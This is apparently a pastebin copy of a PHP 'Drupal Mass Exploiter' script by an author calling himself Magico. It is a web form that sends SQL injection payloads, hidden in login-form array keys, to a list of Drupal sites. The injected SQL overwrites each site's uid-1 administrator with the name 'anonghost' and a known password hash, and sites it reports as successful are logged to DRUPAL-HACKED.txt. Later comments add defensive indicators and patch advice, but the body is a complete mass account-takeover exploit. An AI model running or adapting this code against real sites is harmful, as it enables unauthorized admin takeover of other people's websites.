Elmagico

drupal Mass Exploiter

Aug 10th, 2015
PHP 3.64 KB | None | 0 0
  1. <b>.:: Drupal Mass Exploiter Developed By Magico ::.</b><br>
  2. <b>.:: https://www.facebook.com/magico.sec ::.</b>
  3. <?php
     // Purpose (as visible below): a web form takes a list of base URLs and, for each one,
     // sends two POST requests shaped like Drupal login-form submissions. The `name` field is
     // sent as an array whose first *key* carries a stacked SQL statement that rewrites the
     // users row with uid 1 (name, pass, status).
     // NOTE(review): this request shape matches the publicly documented Drupal 7 SQL injection
     // through array keys in query placeholder expansion - confirm against the vendor advisory
     // and make sure core is on a release that contains that fix.
     //
     // Defender-relevant artefacts this script leaves or relies on:
     //   - request bodies where a `name[...]` key contains spaces, `;` and a trailing `#`,
     //     with an empty form_build_id and form_id of user_login / user_login_block;
     //   - on an affected site: uid 1 renamed to 'anonghost' with the password hash shown below;
     //   - on the host running this script: a DRUPAL-HACKED.txt file that accumulates one line
     //     per site it reported as successful.
  4. echo'<form method="POST" action="">
  5. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
  6. <input type="submit" name="submit" value="submit">
  7. </form>
  8. ';
     // The form above is emitted unconditionally and posts back to this same script.
     // The submitted textarea is read straight from $_POST and split on CRLF; each entry is
     // used as a base URL with no validation beyond trim().
  9. $urls = $_POST['urls'];
  10. $sites = explode("\r\n",$urls);
  11. foreach($sites as $url){
  12. $url =trim($url);
  13.  
      // $file is opened in append mode on every iteration but is not referenced again in the
      // visible code (the writes below use a separate $fp handle).
  14. $file = fopen("DRUPAL-HACKED.txt", "a");
      // Error reporting is switched off, so failed requests produce no PHP diagnostics; the
      // else branches below cannot tell "not affected" from "unreachable".
  15. error_reporting(0);
      // --- Request 1: POST to <url>/user/login/ with form_id=user_login ---
  16. if (isset($_POST['submit'])) {
  17.     //$url = $_POST['url'];
          // Body layout: name[<SQL>]=FcUk, name[]=Crap, pass=test, empty form_build_id.
          // %3D is a URL-encoded '='. The SQL sits in the array key, not in a value, so
          // filters that inspect only parameter values will not see it; log or WAF rules
          // should also inspect parameter names.
          // The hash literal is a page-provided IoC to search for in a users table; the
          // success message below claims it corresponds to the password "admin" (not verifiable here).
  18.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
          // Only a Content-Type header is set in the stream context; no User-Agent is configured
          // here, so unless the php.ini user_agent setting is populated the request goes out
          // without one - a usable signal in access logs for POSTs to login paths.
  19.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  20. ", 'content' => $post_data));
  21.     $ctx = stream_context_create($params);
  22.     $data = file_get_contents($url . '/user/login/', null, $ctx);
  23.     echo "<h4>Scanning at \"/user/login/</h4>\"";
          // "Success" is inferred only from the response body: either a PHP warning string or the
          // submitted name values echoed back. No login is attempted to confirm the change.
          // presumably the warning only appears when the target renders PHP errors to clients;
          // hiding errors removes this feedback but does not address the underlying flaw.
  24.     if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
              // Append the reported hit to DRUPAL-HACKED.txt in the script's working directory;
              // the link echoed below points at /DRUPAL-HACKED.txt on the hosting site.
  25.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
  26.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  27.         echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  28.         echo "<br>---------------------------------------------------------------------------------------<br>";
  29.         fwrite($fp, "Succes! User:anonghost Pass:admin -> {$url}/user/login");
  30.         fwrite($fp, "
  31. ");
  32.         fwrite($fp, "======================================Magico==========================================================");
  33.         fwrite($fp, "
  34. ");
  35.         fclose($fp);
  36.     } else {
  37.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  38.     }
  39. }
      // --- Request 2: same SQL in the name[] key, sent to <url>?q=node&destination=node with
      // form_id=user_login_block (the login block rather than the login page) ---
  40. if (isset($_POST['submit'])) {
  41.     //$url = "http://" . $_GET['url'] . "/";
          // Differs from request 1 only in the dummy values (test3, test2=test) and the form_id.
  42.     $post_data = "name[0;update users set name %3D 'anonghost' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  43.     $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  44. ", 'content' => $post_data));
  45.     $ctx = stream_context_create($params);
  46.     $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  47.     echo "<h4>Scanning at \"Index</h4>\"";
          // Here only the PHP warning string is treated as the success indicator.
  48.     if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  49.         $fp = fopen("DRUPAL-HACKED.txt", 'a');
  50.         echo "Success! User:anonghost Pass:admin at {$url}/user/login <br>";
  51.         echo '<font color="#00FF66">Finished scanning. check =>  </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  52.         echo "<br>======================================================================================<br>";
  53.         fwrite($fp, "Success! User:anonghost Pass:admin -> {$url}/user/login");
  54.         fwrite($fp, "
  55. ");
  56.         fwrite($fp, "======================================Magico===========================================================");
  57.         fwrite($fp, "
  58. ");
  59.         fclose($fp);
  60.     } else {
  61.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  62.         echo "<br>======================================================================================<br>";
  63.     }
  64. }
  65. //==========
  66. }// end foreach
  67.  
  68.  
  69. ?>